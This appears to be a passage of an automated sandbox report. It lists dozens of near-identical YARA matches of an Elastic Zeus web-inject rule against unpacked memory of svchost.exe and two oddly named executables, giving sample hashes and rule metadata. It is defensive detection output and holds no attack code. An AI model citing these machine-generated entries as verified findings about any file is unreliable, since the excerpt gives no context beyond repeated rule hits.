      Source: 1.3.svchost.exe.2606000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.a00000.46.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 13.2.JbrLYfXaOpqnSngA.exe.a00000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 21.2.JbrLYfXaOpqnSngA.exe.c22000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.23.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 23.2.JbrLYfXaOpqnSngA.exe.b92000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 0.2.Bonelessness.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.15.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 29.2.JbrLYfXaOpqnSngA.exe.3012000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.40.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.3c60000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.37.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 16.2.JbrLYfXaOpqnSngA.exe.2fe0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.25.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.36.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 39.2.JbrLYfXaOpqnSngA.exe.2940000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 33.2.JbrLYfXaOpqnSngA.exe.2b40000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.22.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 16.2.JbrLYfXaOpqnSngA.exe.2fe0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 0.3.Bonelessness.exe.86d460.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.2601000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 23.2.JbrLYfXaOpqnSngA.exe.b92000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 31.2.JbrLYfXaOpqnSngA.exe.852000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.20.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.2606c00.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.19.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.2570000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 31.2.JbrLYfXaOpqnSngA.exe.852000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.31.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.38.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.3c60000.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 0.3.Bonelessness.exe.868460.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 25.2.JbrLYfXaOpqnSngA.exe.2ab0000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.29.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.23.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.2.svchost.exe.2d83c00.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.2.svchost.exe.24c2000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 1.3.svchost.exe.39e0000.22.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
      Source: 37.2.JbrLYfXaOpqnSngA.exe.27f0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
